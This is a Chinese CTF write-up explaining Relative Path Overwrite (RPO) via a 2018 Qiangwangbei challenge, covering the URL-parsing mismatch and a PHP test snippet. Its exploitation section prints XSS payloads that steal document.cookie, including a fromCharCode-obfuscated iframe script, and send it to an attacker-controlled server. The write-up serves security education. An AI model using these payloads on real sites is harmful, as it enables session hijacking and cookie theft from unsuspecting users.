---
title: RPO
date: 2018-04-12 00:08:08
tags:
---
文章首发于[先知社区](https://xz.aliyun.com/t/2220),转载请注明来源

本文由[D0g3安全小组](http://d0g3.club/)，@Ph0rse编写。

### 简介

通过这次强网杯，见识到了RPO这种漏洞，也是在畅师傅的指导下，学习了一波，写篇文章记录一下~

RPO的全称为“Relative Path Overwrite”，也就是相对路径覆盖。利用浏览器和服务器对资源加载设置的差异，通过某些方法和技巧，在相对路径处，引入我们可控的js/css文件，甚至引入非js/css文件，并按照js/css的语法执行，从而实现攻击。

### Fuck the “Share your mind”

这是18-03-24强网杯的一道题，也是从这里开始接触RPO这个漏洞，以下简单介绍一下这道题的做法:
首先就是一个登录界面

![](http://ovc0f0a85.bkt.clouddn.com/201803251627_322.png)

简单测试后可以发现并没有SQL注入或者XSS漏洞，之后注册一个账号，登录进去。测试各个页面，还是没有发现SQL注入
在做比赛的小伙伴可能会对以下这个页面很熟悉：

![](http://ovc0f0a85.bkt.clouddn.com/201803251629_161.png)
没错，就是这个“脸上”写着“这里有FLAG”的页面，而且如果在Reports框里输入`http://39.107.33.96:20000/<script src=http://VPSIP ></script>`，它真的会访问我们自己的VPS，结合第一个提示：

![](http://ovc0f0a85.bkt.clouddn.com/201803251639_571.png)

再联想到i春秋的一篇[文章](https://bbs.ichunqiu.com/thread-24786-1-1.html?from=bkyl)
通过反调PhantomJS XSS bot 把XSS漏洞升级为SSRF/LFR

惊不惊喜？意不意外？是不是感觉从此拿到FLAG，出任CEO，迎娶白富美，从此走上人生巅峰了？

呵~想！多！了！

不知道为什么，VPS上的js代码就是没办法执行

之后才了解到，真正的漏洞点在这里：

![](http://ovc0f0a85.bkt.clouddn.com/201803251645_841.png)

。。。

![](http://ovc0f0a85.bkt.clouddn.com/201803251647_432.png)

也就是我们今天要介绍的主角，RPO导致的XSS漏洞了……

### phpinfo url 模式

在看漏洞流程之前，我们先介绍一个知识点，就是按照目录方式获取资源，以及phpinfo URL模式。
`http://39.107.33.96:20000/index.php/view/article/763`
难道有一个目录交index.php吗？不是的，它使用了url rewrite的php开发框架，也叫PHPINFO URL模式
等价于
`http://39.107.33.96:20000/index.php?mod=view&article=763`
在这道题里，返回的，就是我们输入的文章内容，当标题为空时，只返回内容的纯文本，不包含html代码。
![](http://ovc0f0a85.bkt.clouddn.com/201803261259_304.png)


### 漏洞成因
文章最开始提到过，RPO漏洞就是“相对路径覆盖”，而这道题的漏洞产生，也是因为相对路径

![](http://ovc0f0a85.bkt.clouddn.com/201803261525_251.png)

我们来分析一下上面导致漏洞的payload

`http://39.107.33.96:20000/index.php/view/article/36967/..%2f..%2f..%2f..%2findex.php`

对于php而言，它获得的请求是url解码后的，%2F会被解码为/，apache和nginx会按照目录的方式来返回我们请求的资源。

对于payload，也就相当于访问

`http://39.107.33.96:20000/index.php/view/article/36967/../../../../index.php`

向上跳了三层，依旧返回index.php页面的内容

但是！服务端和客户端之间产生了沟通差异，浏览器在寻找js资源的时候，并没有对%2f进行解码，就认为
`..%2f..%2f..%2f..%2findex.php`这一坨是一段数据，但是又没有人来接收这段数据，相当于报废。
就好比输入url-`https://www.baidu.com?id=1`，向百度传递了一个参数id，但它后端没有接收的代码，相当于没有传递，返回的资源仍然是`https://www.baidu.com`的。而`http://39.107.33.96:20000/index.php/view/article/36967/..%2f..%2f..%2f..%2findex.php`相当于在文章ID为36967的文章页面传了一个叫`..%2f..%2f..%2f..%2findex.php`的参数，没有人接收，所以返回的资源就只是`http://39.107.33.96:20000/index.php/view/article/36967/`的。

浏览器错误理解url后，请求相对路径中请求的资源路径，就变成了`http://39.107.33.96:20000/index.php/view/article/36967/..%2f..%2f..%2f..%2findex.php/static/js/jquery.min.js`

当我们向服务器提交这个请求的时候，服务器会按照phpinfo模式来读取这个url，

读到`..%2f..%2f..%2f..%2findex.php`这里就读不下去了，识别不了，退一步，把前面能识别的内容返回回来，也就是`http://39.107.33.96:20000/index.php/view/article/36967/`

![](http://ovc0f0a85.bkt.clouddn.com/201803251723_122.png)

我们看网络里的请求，也可以看到浏览器按照phpinfo的格式来解析url的话，只会访问到能识别的地方

![](http://ovc0f0a85.bkt.clouddn.com/201803251728_264.png)
这里要注意，xxxdir只是为了表示这是一个没有用的dir，换成aaadir效果也是一样的，同理把`..%2f..%2f..%2f..%2findex.php`当做dir也是一样的。

把`http://39.107.33.96:20000/index.php/view/article/36967/`的页面内容，也就是`alert(1)`当做是js文件的内容，带回到了`<script>`标签中，也就因此，造成了XSS漏洞


漏洞完成过程
首先填写一个只有内容，没有标题的Ideas
![](http://ovc0f0a85.bkt.clouddn.com/201803251734_133.png)

如果标题不为空

![](http://ovc0f0a85.bkt.clouddn.com/201803251736_961.png)

那请求的结果将含有HTML代码，如果这个时候再把返回的数据当做是JavaScript代码解析，就会发生异常。

![](http://ovc0f0a85.bkt.clouddn.com/201803251736_975.png)

之后我们就可以伪造请求，比如`(new Image()).src = 'http://VPSIP:Port?'+document.cookie`
由于漏洞点过滤了引号，所以可以用fromCharCode进行绕过处理
(new Image()).src = String.fromCharCode(104,116,116,112,58,47,47,53,52,46,50,51,53,46,50,51,52,46,54,56,58,50,51,51,47)+document.cookie;

![](http://ovc0f0a85.bkt.clouddn.com/201803261433_906.png)
写这篇文章的时候，后台的自动点击脚本貌似没在运行了，只能我自己触发一下xss，弹个自己的PHPSESSION回来。比赛过程中会有个提示，让你去打二级目录`/QWB_fl4g/QWB/`

然后使用iframe标签去读二级目录下的cookie

    iframe
    var iframe = document.createElement(String.fromCharCode(105,102,114,97,109,101));
    iframe.src = String.fromCharCode(47,81,87,66,95,102,108,52,103,47,81,87,66,47);
    iframe.id = String.fromCharCode(102,114,97,109,101);
    document.body.appendChild(iframe);
    iframe.onload = function (){
        var c = document.getElementById(String.fromCharCode(102,114,97,109,101)).contentWindow.document.cookie;
    var n0t = document.createElement(String.fromCharCode(108,105,110,107));
    n0t.setAttribute(String.fromCharCode(114,101,108), String.fromCharCode(112,114,101,102,101,116,99,104));
    n0t.setAttribute(String.fromCharCode(104,114,101,102), String.fromCharCode(47,47,53,52,46,50,51,53,46,50,51,52,46,54,56,58,50,51,51,47,63,102,108,97,103,61) + c);
    document.head.appendChild(n0t);
    }

VPS处就可以监听到返回的flag~

### 总结

用畅师傅说的一句话总结RPO的核心原理，“RPO漏洞，就是服务端和客户端对这个URL的解析不一致导致的”，其实仔细想一想，任何漏洞不都是这个道理嘛，宽字节，00截断，都是利用不同功能板块之间解析规则的差异，造成语义上的混淆，从而导致了漏洞。

### 小练习

俗话说的好“Talk is cheap, show me the Code”，如果对这RPO还是有疑惑的话，可以用以下的代码片段自己动手测试一下。

测试代码扒自p00mj师傅的[文章](https://www.cnblogs.com/p00mj/p/6755000.html)

php代码

    <?php $path='http://localhost/hello/'?>
    <a class="navbar-brand" href="<?php echo $path?>url.php">三国杀</a>
    <li class="active" id='wei'><a href="<?php echo $path?>url.php/country/wei">魏</a></li>
    <li id ='shu'><a href="<?php echo $path?>url.php/country/shu">蜀</a></li>
    <li class="active" id='wu'><a href="<?php echo $path?>url.php/country/wu">吴</a></li>
    <link rel="stylesheet" href="./style.css" style="css" />
    <?php
    $arr=isset($_SERVER['PATH_INFO'])?explode('/',trim($_SERVER['PATH_INFO'],'/')):null;
    //var_dump($arr);
    //echo $arr
    $value='';
    for($_=0;$_<count($arr);$_+=2)
    {
        $value[$arr[$_]] = $arr[$_+1];
    }
    $value['country']=isset($value['country'])?$value['country']:null;
    switch ($value['country']) {
        case 'wei':
            ?>
            <h1>welcome to 魏国!</h1>
            <?php
            break;
        case 'shu':
            ?>

            <h1>welcome to 蜀国!</h1>

            <?php
            break;
        case 'wu':
            ?>
            <h1>welcome to 吴国!</h1>

            <?php
            break;

        default:
            ?>
            <h1>welcome!</h1>
            <?php
            break;
    }
    ?>

style.css文件

    h1 {
    font-size:180px;
    color:blue;
    }

在绿盟的这篇[文章](http://blog.nsfocus.net/rpo-attack/)中提到说Apache无法解析这种URL，会返回404。其实是默认配置的问题，可以来看[这篇文章](http://www.ideawu.net/blog/archives/494.html)

Pwnhub在之前也出过一道题，[大物必须过](http://www.qingpingshan.com/pc/aq/240597.html)，这位师傅的做题思路很赞，就是没找到师傅的ID……还想着观摩一下博客什么的……

在Github上也有一个CTF题目的源码，利用RPO，进行XSS+CSRF攻击。

https://github.com/eboda/34c3ctf/tree/master/urlstorage

以上  

### 参考链接

https://www.cnblogs.com/p00mj/p/6755000.html
http://blog.nsfocus.net/rpo-attack/
http://www.qingpingshan.com/pc/aq/240597.html





